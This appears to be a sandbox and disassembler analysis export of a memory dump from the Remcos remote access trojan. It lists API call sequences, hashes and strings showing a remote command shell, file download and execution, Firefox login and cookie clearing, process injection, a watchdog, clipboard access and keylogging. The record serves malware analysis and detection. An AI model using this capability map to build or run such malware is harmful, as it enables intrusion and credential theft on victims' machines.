                            • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                            • Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                            • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                            Control-flow Graph

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                            • closesocket.WS2_32(000000FF), ref: 0040481F
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                            • String ID:
                            • API String ID: 3658366068-0
                            • Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                            • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                            • Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                            • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: LongNamePath
                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                            • API String ID: 82841172-425784914
                            • Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                            • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                            • Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                            • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue
                            • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 1866151309-3211212173
                            • Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                            • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                            • Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                            • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                            • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                            • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: HgF$pth_unenc
                            • API String ID: 1818849710-3662775637
                            • Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                            • Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                            • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: TUF
                            • API String ID: 1818849710-3431404234
                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                            • GetLastError.KERNEL32 ref: 0040BEF1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID: (CG
                            • API String ID: 1925916568-4210230975
                            • Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                            • Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                            • RegCloseKey.KERNELBASE(?), ref: 0041255F
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                            • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                            • RegCloseKey.KERNELBASE(?), ref: 00412500
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E1D2
                            • _free.LIBCMT ref: 0044E20B
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E212
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnvironmentStrings$Free_free
                            • String ID:
                            • API String ID: 2716640707-0
                            • Opcode ID: b18c947654e7b0546aa6222021d2cd9bdeba9737cdf1a969c3be5f4868f739c1
                            • Instruction ID: 604b519dfe4379e15ef5464dbc843faceff6e13584e6925da33daec4a3bd613e
                            • Opcode Fuzzy Hash: b18c947654e7b0546aa6222021d2cd9bdeba9737cdf1a969c3be5f4868f739c1
                            • Instruction Fuzzy Hash: A7E0E53714492026F211722B7C4AD6B2A1DEFC27B6B26002AF40492243EE298D0240FA
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                            • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen
                            • String ID: xAG
                            • API String ID: 176396367-2759412365
                            • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                            • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                            • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                            • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                            APIs
                            • _free.LIBCMT ref: 0044B9EF
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • RtlReAllocateHeap.NTDLL(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap$_free
                            • String ID:
                            • API String ID: 1482568997-0
                            • Opcode ID: f9850f2e4451b66dc1836ae2daa4b0b8db6d154ee956e2f6ea7b1b5ba2d488f5
                            • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                            • Opcode Fuzzy Hash: f9850f2e4451b66dc1836ae2daa4b0b8db6d154ee956e2f6ea7b1b5ba2d488f5
                            • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                            APIs
                            • socket.WS2_32(?,00000001,00000006), ref: 00404212
                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEventStartupsocket
                            • String ID:
                            • API String ID: 1953588214-0
                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                              • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                            Similarity
                            • API ID: Exception@8Throw$ExceptionRaise
                            • String ID:
                            • API String ID: 3476068407-0
                            APIs
                              • Part of subcall function 00448716: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757
                            • _free.LIBCMT ref: 0044EF31
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            APIs
                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            APIs
                            Similarity
                            • API ID: send
                            • String ID:
                            • API String ID: 2809346765-0
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                              • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                              • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                              • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                            • Sleep.KERNEL32(000007D0), ref: 00407976
                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                              • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                            Strings
                            Similarity
                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                            • API String ID: 2918587301-599666313
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040508E
                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • __Init_thread_footer.LIBCMT ref: 004050CB
                            • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                            • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                            • CloseHandle.KERNEL32 ref: 004053CD
                            • CloseHandle.KERNEL32 ref: 004053D5
                            • CloseHandle.KERNEL32 ref: 004053E7
                            • CloseHandle.KERNEL32 ref: 004053EF
                            Strings
                            Similarity
                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                            • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                            • API String ID: 3815868655-1274243119
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                            Strings
                            Similarity
                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                            • API String ID: 65172268-860466531
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                            • FindClose.KERNEL32(00000000), ref: 0040B517
                            Strings
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                            • API String ID: 1164774033-3681987949
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                            Strings
                            Similarity
                            • API ID: Find$Close$File$FirstNext
                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 3527384056-432212279
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                            Strings
                            Similarity
                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                            • API String ID: 726551946-3025026198
                            APIs
                            • OpenClipboard.USER32 ref: 004159C7
                            • EmptyClipboard.USER32 ref: 004159D5
                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                            • CloseClipboard.USER32 ref: 00415A5A
                            • OpenClipboard.USER32 ref: 00415A61
                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                            • CloseClipboard.USER32 ref: 00415A89
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                            • String ID:
                            • API String ID: 3520204547-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: 0$1$2$3$4$5$6$7
                            • API String ID: 0-3177665633
                            APIs
                            • GetForegroundWindow.USER32 ref: 00409B3F
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                            • GetKeyState.USER32(00000010), ref: 00409B5C
                            • GetKeyboardState.USER32(?), ref: 00409B67
                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
